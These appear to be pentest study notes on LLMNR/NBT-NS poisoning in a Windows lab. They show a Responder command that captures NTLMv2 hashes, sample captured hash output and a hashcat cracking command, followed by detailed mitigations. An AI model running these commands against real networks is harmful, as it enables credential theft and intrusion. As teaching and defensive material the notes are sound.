- LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails.
- Previously, NBT-NS was used for this purpose.
- Key flaw: Services may leak a user's username and NTLMv2 hash if an attacker responds to LLMNR/NBT-NS queries.
LLMNR poisoning allows an attacker to capture NTLMv2 hashes from users on the same network segment. These hashes can then be cracked offline to obtain cleartext passwords.
Responder is a tool that listens for LLMNR/NBT-NS requests and responds to them, tricking victims into sending their credentials.
sudo responder -I tun0 -dwP-I tun0: Specify the network interface-d: Enable NetBIOS poisoning-w: Enable WPAD proxy-P: Enable LLMNR poisoning
When a victim attempts to resolve a name and LLMNR/NBT-NS is used, Responder will capture the NTLMv2 hash.
Example output:
[SMBv2] NTLMv2-SSP Username : MARVEL\fcastle
[SMBv2] NTLMv2-SSP Hash : fcastle::MARVEL:61dde887aeb2af2a:76dd8039b96061195586bc9a4ef5f3c1:...:0101000000000000...
Use hashcat to crack the captured hash (mode 5600 for NTLMv2):
hashcat -m 5600 hashes.txt rockyou.txthashes.txt: File containing captured hashesrockyou.txt: Wordlist
Example cracked output:
Session..........: hashcat
Status...........: Cracked
...
Password1
The best defense is to disable LLMNR and NBT-NS entirely:
- Open Group Policy Editor (
gpedit.msc) - Navigate to:
Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client - Find "Turn OFF Multicast Name Resolution"
- Set to Enabled
- Go to Network Connections
- Right-click network adapter > Properties
- Select TCP/IPv4 Properties
- Click Advanced > WINS tab
- Select "Disable NetBIOS over TCP/IP"
If the organization must use or cannot disable LLMNR/NBT-NS:
- Require Network Access Control (NAC)
- Implement proper network segmentation to limit attack scope
- Use VLANs to isolate critical systems
- Require strong user passwords:
- Minimum 14+ characters in length
- Limit common word usage
- Use complex combinations (uppercase, lowercase, numbers, symbols)
- The longer and more complex the password, the harder it is to crack the captured hash
- Monitor for Responder activity in network logs
- Implement SMB signing to prevent relay attacks
- Use multi-factor authentication (MFA) where possible
- Regular password rotation policies
- LLMNR/NBT-NS poisoning is a common way to capture Windows credentials on internal networks
- Use Responder to capture hashes, then crack them with hashcat
- Primary mitigation: Disable LLMNR and NBT-NS completely
- If disabling isn't possible: Implement NAC, strong passwords (14+ chars), and network segmentation